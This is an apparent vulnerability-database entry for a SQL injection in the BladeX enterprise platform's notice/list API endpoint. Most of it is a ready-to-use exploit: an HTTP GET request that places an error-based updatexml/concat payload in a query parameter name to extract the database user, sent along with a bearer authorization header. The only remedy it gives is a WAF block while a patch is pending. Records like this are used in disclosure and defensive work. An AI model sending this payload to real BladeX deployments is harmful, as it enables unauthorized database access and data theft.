vendor = "BladeX"
name = "BladeX企业级开发平台 notice/list SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/api/blade-desk/notice/list"
detail = "GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1 Host: User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Blade-Auth: bearer eyJhbGciOiJIUzI1N\""
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
